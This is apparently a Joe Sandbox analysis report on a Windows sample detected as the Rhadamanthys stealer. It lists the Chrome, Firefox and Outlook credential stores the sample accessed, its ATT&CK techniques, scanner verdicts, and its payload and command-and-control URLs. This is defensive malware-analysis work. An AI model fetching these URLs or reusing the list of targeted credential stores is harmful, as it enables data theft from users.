Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Source: Yara match

File source: Process Memory Space: OpenWith.exe PID: 6012, type: MEMORYSTR

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E57814B8 socket,bind,	15_3_00007DF4E57814B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,	15_3_00007DF4E574F83C
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 16_2_000002034328CDEC CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,	16_2_000002034328CDEC

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	3 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	312 Process Injection	21 Input Capture	131 Security Software Discovery	Remote Desktop Protocol	21 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	2 Data from Local System	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	26 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nF54KOU30R.exe	58%	ReversingLabs	Win32.Trojan.Privateloader
nF54KOU30R.exe	61%	Virustotal		Browse
nF54KOU30R.exe	100%	Avira	TR/Dldr.Agent_AGen.leqho
nF54KOU30R.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
bitbucket.org	0%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://discord.com	0%	Avira URL Cloud	safe
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5a	0%	Avira URL Cloud	safe
https://bitbucket.org/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://bitbucket.org/	0%	Virustotal		Browse
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n	1%	Virustotal		Browse
https://discord.com	0%	Virustotal		Browse
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC	0%	Avira URL Cloud	safe
https://discordapp.com	0%	Avira URL Cloud	safe
https://web-security-reports.services.atlassian.com/csp-report/bb-website	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17A66	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://web-security-reports.services.atlassian.com/csp-report/bb-website	0%	Virustotal		Browse
https://d136azpfpnge1l.cloudfront.net/;	0%	Avira URL Cloud	safe
https://bitbucket.org/0	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP	0%	Avira URL Cloud	safe
https://discordapp.com	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://web-security-reports.services.atlassian.com/csp-report/bb-website~e	0%	Avira URL Cloud	safe
https://d136azpfpnge1l.cloudfront.net/;	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:	0%	Avira URL Cloud	safe
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://cdn.cookielaw.org/	0%	Avira URL Cloud	safe
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0nkernelbasentdllkernel32GetProcessMitigati	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Virustotal		Browse
https://aui-cdn.atlassian.com/	0%	Avira URL Cloud	safe
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://cdn.cookielaw.org/	0%	Virustotal		Browse
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA	1%	Virustotal		Browse
https://d301sr5gafysq2.cloudfront.net/	0%	Avira URL Cloud	safe
https://d301sr5gafysq2.cloudfront.net/	0%	Virustotal		Browse
https://aui-cdn.atlassian.com/	0%	Virustotal		Browse
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bitbucket.org	104.192.141.1	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n	dialer.exe, 00000005.00000002.1994131096.000000000259C000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321330995.000001F0D737C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321549596.000001F0D7426000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265610834.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256879858.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bitbucket.org/	nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5a	OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discord.com	OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website	nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discordapp.com	OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17A66	OpenWith.exe, 0000000F.00000003.2076758664.000001F0D7394000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://d136azpfpnge1l.cloudfront.net/;	nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org/0	nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP	OpenWith.exe, 0000000F.00000002.2321311463.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2230586542.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265431962.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2107281075.000001F0D7374000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2109142807.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256683034.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website~e	nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6	OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:	OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077245236.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116540453.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2108797615.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077757038.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075206262.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147260095.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079158440.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA	nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0nkernelbasentdllkernel32GetProcessMitigati	dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aui-cdn.atlassian.com/	nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://d301sr5gafysq2.cloudfront.net/	nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.192.141.1	bitbucket.org	United States		16509	AMAZON-02US	false
94.156.67.91	unknown	Bulgaria		31420	TERASYST-ASBG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446953
Start date and time:	2024-05-24 05:08:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nF54KOU30R.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/0@1/2
EGA Information:	Successful, ratio: 50%
